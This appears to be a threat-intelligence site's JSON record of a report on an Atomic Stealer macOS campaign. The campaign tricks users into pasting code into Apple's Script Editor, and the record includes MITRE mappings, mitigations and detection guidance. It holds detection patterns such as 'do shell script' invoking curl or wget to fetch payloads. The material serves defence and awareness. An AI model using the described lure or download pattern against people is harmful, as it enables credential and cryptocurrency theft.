[{"data":1,"prerenderedAt":149},["ShallowReactive",2],{"article-slug-atomic-stealer-targets-macos-with-new-clickfix-attack":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":34,"sources":35,"events":48,"mitre_techniques":49,"mitre_mitigations":67,"d3fend_countermeasures":111,"iocs":116,"cyber_observables":117,"tags":134,"extract_datetime":140,"article_type":141,"impact_scope":142,"pub_date":39,"reading_time_minutes":148,"createdAt":140,"updatedAt":140},"63295c07-5050-4fca-9da2-23e7ef03d2c1","atomic-stealer-targets-macos-with-new-clickfix-attack","Atomic Stealer Malware Bypasses macOS Warnings with New 'ClickFix' Attack Vector","Atomic Stealer Evolves 'ClickFix' Tactic to Target macOS Users via Apple's Script Editor","A new malware campaign is delivering the Atomic Stealer (AMOS) infostealer to macOS users by evolving the 'ClickFix' social engineering technique. To bypass recent security warnings Apple added to the Terminal application, threat actors are now tricking users into launching Apple's built-in Script Editor and pasting malicious code. The attack, identified by Jamf Threat Labs, uses convincing browser pop-ups to guide victims through a fake troubleshooting workflow, ultimately leading to the installation of the AMOS infostealer and a persistent backdoor.","## Executive Summary\n\nThreat actors distributing the **[Atomic Stealer](https://malpedia.caad.fkie.fraunhofer.de/details/osx.atomic) (AMOS)** infostealer have adapted their tactics to bypass recent security enhancements in macOS. According to researchers at **[Jamf](https://www.jamf.com/)** Threat Labs, a new campaign is using an evolved version of the \"ClickFix\" social engineering attack. Instead of tricking users into pasting malicious commands into the Terminal, which now triggers a security warning in macOS 26.4, the attackers now guide victims to use **[Apple's](https://www.apple.com)** built-in Script Editor. This demonstrates the continuous cat-and-mouse game between platform vendors and malware authors, where attackers quickly find alternative paths to achieve their goals once a vector is closed.\n\n---\n\n## Threat Overview\n\n**Atomic Stealer** is a potent infostealer designed specifically to target macOS, capable of harvesting a wide range of sensitive data, including browser passwords, cookies, crypto wallets, and system information. The \"ClickFix\" attack is a social engineering method that relies on deception rather than a software vulnerability.\n\nThe new attack chain is as follows:\n1.  **Lure:** The victim encounters a full-window browser pop-up that convincingly mimics an official Apple system alert. The pop-up claims to offer a way to reclaim disk space or fix a system issue.\n2.  **Social Engineering:** The user is guided through a series of steps, presented as a legitimate troubleshooting process.\n3.  **Vector Switch:** Instead of instructing the user to open the Terminal, the instructions now direct them to open the Script Editor application, which is included with macOS.\n4.  **Execution:** The user is told to paste a block of malicious code (likely AppleScript or a shell script wrapper) into the Script Editor and run it. Since Script Editor is a trusted Apple application designed to run code, it does not trigger the same warnings as pasting into the Terminal.\n5.  **Payload Delivery:** Running the script downloads and installs the AMOS infostealer and a backdoor for persistent access.\n\n## Technical Analysis\n\nThis campaign is a clear example of attackers adapting to new defenses. Apple's introduction of a warning for pasting commands into the Terminal in macOS 26.4 was a meaningful security improvement. However, the attackers simply pivoted to another built-in application that can execute code.\n\n- **Abuse of Trusted Application:** The core of the technique is abusing the inherent trust and functionality of Script Editor. This aligns with [`T1204.001 - User Execution: Malicious Link`](https://attack.mitre.org/techniques/T1204/001/) and [`T1204.002 - User Execution: Malicious File`](https://attack.mitre.org/techniques/T1204/002/), as the user is the one who ultimately executes the code.\n- **AppleScript/Shell Script:** The payload pasted into Script Editor is likely an AppleScript that contains a `do shell script` command. This allows the attacker to execute arbitrary shell commands to download and run the main AMOS binary, a technique covered under [`T1059.002 - Command and Scripting Interpreter: AppleScript`](https://attack.mitre.org/techniques/T1059/002/).\n- **Defense Evasion:** By using Script Editor, the attackers successfully bypass the specific defense Apple implemented for the Terminal, a classic defense evasion tactic.\n\n## Impact Assessment\n\nA successful infection with Atomic Stealer can lead to a complete compromise of the victim's digital life and credentials.\n- **Credential Theft:** AMOS can steal passwords, cookies, and session tokens from all major browsers, giving attackers access to email, social media, banking, and corporate accounts.\n- **Financial Theft:** The malware specifically targets cryptocurrency wallets, enabling direct financial theft.\n- **Full System Access:** The installation of a backdoor provides the attacker with persistent access to the compromised Mac, allowing them to install further malware, spy on the user, or use the machine as part of a botnet.\n\n## IOCs\n\nNo specific IOCs were provided in the summary articles.\n\n## Detection & Response\n\nDetection relies on monitoring for the execution of suspicious scripts and outbound network connections.\n\n1.  **Process Monitoring:** Use an EDR or security agent for macOS to monitor for the execution of scripts via Script Editor (`osascript` process). Look for scripts that make outbound network connections or write files to disk.\n2.  **Network Monitoring:** Monitor for network connections to known AMOS C2 servers. Threat intelligence feeds should be updated with the latest indicators for this malware family.\n3.  **Unified Logging:** Use macOS's unified logging system to search for events related to `osascript` execution and file creation in suspicious directories like `/tmp/` or `~/Library/LaunchAgents/`.\n\n**D3FEND Reference:** Detection would involve [`D3-PA - Process Analysis`](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis) to watch for `osascript` spawning shell processes that download files, and [`D3-NTA - Network Traffic Analysis`](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis) to spot the C2 communication.\n\n## Mitigation\n\nSince this is a social engineering attack, user awareness is the primary mitigation.\n\n- **User Education:** Train users to be extremely skeptical of any browser pop-up or message that instructs them to manually copy and paste code into any application, whether it's Terminal, Script Editor, or anything else. Legitimate troubleshooting rarely, if ever, involves this step.\n- **Endpoint Protection (EPP/EDR):** Deploy a modern EPP/EDR solution for macOS that can detect and block known malware like Atomic Stealer based on its behavior and signatures.\n- **Principle of Least Privilege:** Ensure users do not run with administrative privileges for daily tasks. While this attack doesn't require admin rights for the initial execution, it can limit the malware's ability to install persistent components.\n\n**D3FEND Reference:** The most effective countermeasure is user-focused. While not a direct D3FEND technique, this aligns with the principle of hardening the human element. Technically, [`D3-EDL - Executable Denylisting`](https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting) could be used to block Script Editor for most users, but this is often not practical.","macOS users targeted: Atomic Stealer (AMOS) malware now uses a new 'ClickFix' attack, tricking users into pasting malicious code into Apple's Script Editor to bypass recent Terminal security warnings. 🍎 #macOS #Malware #AtomicStealer #CyberSecurity","A new Atomic Stealer (AMOS) campaign targeting macOS bypasses Apple's security warnings by tricking users into running malicious code in the Script Editor instead of the Terminal.",[13,14,15],"Malware","Phishing","Mobile Security","high",[18,22,26,29,32],{"name":19,"type":20,"url":21},"Atomic Stealer (AMOS)","malware","https://malpedia.caad.fkie.fraunhofer.de/details/osx.atomic",{"name":23,"type":24,"url":25},"Apple","vendor","https://www.apple.com/",{"name":27,"type":28},"macOS","product",{"name":30,"type":31},"Jamf Threat Labs","security_organization",{"name":33,"type":28},"Apple Script Editor",[],[36,42],{"url":37,"title":38,"date":39,"friendly_name":40,"website":41},"https://www.infosecurity-magazine.com/news/atomic-stealer-macos-clickfix/","Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings","2026-04-09","Infosecurity Magazine","infosecurity-magazine.com",{"url":43,"title":44,"date":45,"friendly_name":46,"website":47},"https://www.jahnf.de/2026/04/08/neue-macos-malware-umgeht-apples-schutzmassnahmen/","New macOS malware circumvents Apple's protective measures","2026-04-08","Jahnf.de","jahnf.de",[],[50,54,57,61,64],{"id":51,"name":52,"tactic":53},"T1204.002","User Execution: Malicious File","Execution",{"id":55,"name":56,"tactic":53},"T1059.002","Command and Scripting Interpreter: AppleScript",{"id":58,"name":59,"tactic":60},"T1555.003","Credentials from Password Stores","Credential Access",{"id":62,"name":63,"tactic":60},"T1539","Steal Web Session Cookie",{"id":65,"name":66,"tactic":60},"T1552.006","Credentials in Browser",[68,73,90],{"id":69,"name":70,"description":71,"domain":72},"M1017","User Training","The most effective mitigation is training users to recognize the social engineering tactic and to never copy/paste code from an untrusted source into any application.","enterprise",{"id":74,"name":75,"d3fend_techniques":76,"description":89,"domain":72},"M1049","Antivirus/Antimalware",[77,81,85],{"id":78,"name":79,"url":80},"D3-FCR","File Content Rules","https://d3fend.mitre.org/technique/d3f:FileContentRules",{"id":82,"name":83,"url":84},"D3-FH","File Hashing","https://d3fend.mitre.org/technique/d3f:FileHashing",{"id":86,"name":87,"url":88},"D3-PA","Process Analysis","https://d3fend.mitre.org/technique/d3f:ProcessAnalysis","Deploy a reputable EDR/EPP solution for macOS that can detect and block Atomic Stealer and its behaviors.",{"id":91,"name":92,"d3fend_techniques":93,"description":110,"domain":72},"M1038","Execution Prevention",[94,98,102,106],{"id":95,"name":96,"url":97},"D3-DLIC","Driver Load Integrity Checking","https://d3fend.mitre.org/technique/d3f:DriverLoadIntegrityChecking",{"id":99,"name":100,"url":101},"D3-EAL","Executable Allowlisting","https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting",{"id":103,"name":104,"url":105},"D3-EDL","Executable Denylisting","https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting",{"id":107,"name":108,"url":109},"D3-PSEP","Process Segment Execution Prevention","https://d3fend.mitre.org/technique/d3f:ProcessSegmentExecutionPrevention","In high-security environments, consider using application control to block the use of Script Editor for all non-developer users.",[112,114],{"technique_id":86,"technique_name":87,"url":88,"recommendation":113,"mitre_mitigation_id":74},"To counter the evolved 'ClickFix' attack, defenders should use Process Analysis to monitor for the specific, anomalous behavior of the Apple Script Editor. A key detection rule would be to alert whenever the Script Editor's underlying process, `osascript`, executes a 'do shell script' command that involves network activity, such as `curl` or `wget`. This is a very strong indicator of a malicious script attempting to download a second-stage payload. Furthermore, an EDR solution should be configured to analyze the chain of events: Browser -> User launches Script Editor -> Script Editor process (`osascript`) spawns a shell -> Shell process makes a network connection. This behavioral chain is highly indicative of the AMOS campaign and allows for detection regardless of the specific script or payload hash.",{"technique_id":103,"technique_name":104,"url":105,"recommendation":115,"mitre_mitigation_id":91},"Since this attack relies on abusing a legitimate, built-in macOS application, a powerful mitigation for corporate environments is to use Executable Denylisting. Most non-developer users have no legitimate reason to use the Apple Script Editor. Using an MDM solution or EDR platform, administrators can create a policy that prevents the execution of `Script Editor.app` for all users except those in a specific 'developer' group. This directly removes the tool that the attackers have pivoted to, forcing them to find yet another vector. While this may seem like a blunt instrument, it's an effective way to harden endpoints and reduce the attack surface by removing unnecessary, dual-use tools from standard user machines.",[],[118,124,129],{"type":119,"value":120,"description":121,"context":122,"confidence":123},"process_name","osascript","The command-line tool for executing AppleScript. Monitor for its execution, especially when initiated by a browser or when it contains shell script commands like 'do shell script'.","EDR logs, macOS unified logging.","medium",{"type":125,"value":126,"description":127,"context":128,"confidence":16},"command_line_pattern","do shell script \"curl *\"","A common pattern in malicious AppleScripts where a shell command is used to download a secondary payload from the internet.","Script content analysis, EDR command-line logging.",{"type":130,"value":131,"description":132,"context":133,"confidence":16},"file_path","~/Library/LaunchAgents/","Atomic Stealer and other macOS malware often place .plist files in this directory to establish persistence.","File Integrity Monitoring (FIM), EDR.",[13,27,135,136,137,138,139],"Atomic Stealer","AMOS","Social Engineering","ClickFix","Infostealer","2026-04-09T15:00:00.000Z","NewsArticle",{"geographic_scope":143,"industries_affected":144,"other_affected":146},"global",[145],"Technology",[147],"macOS users",4,1776260615363]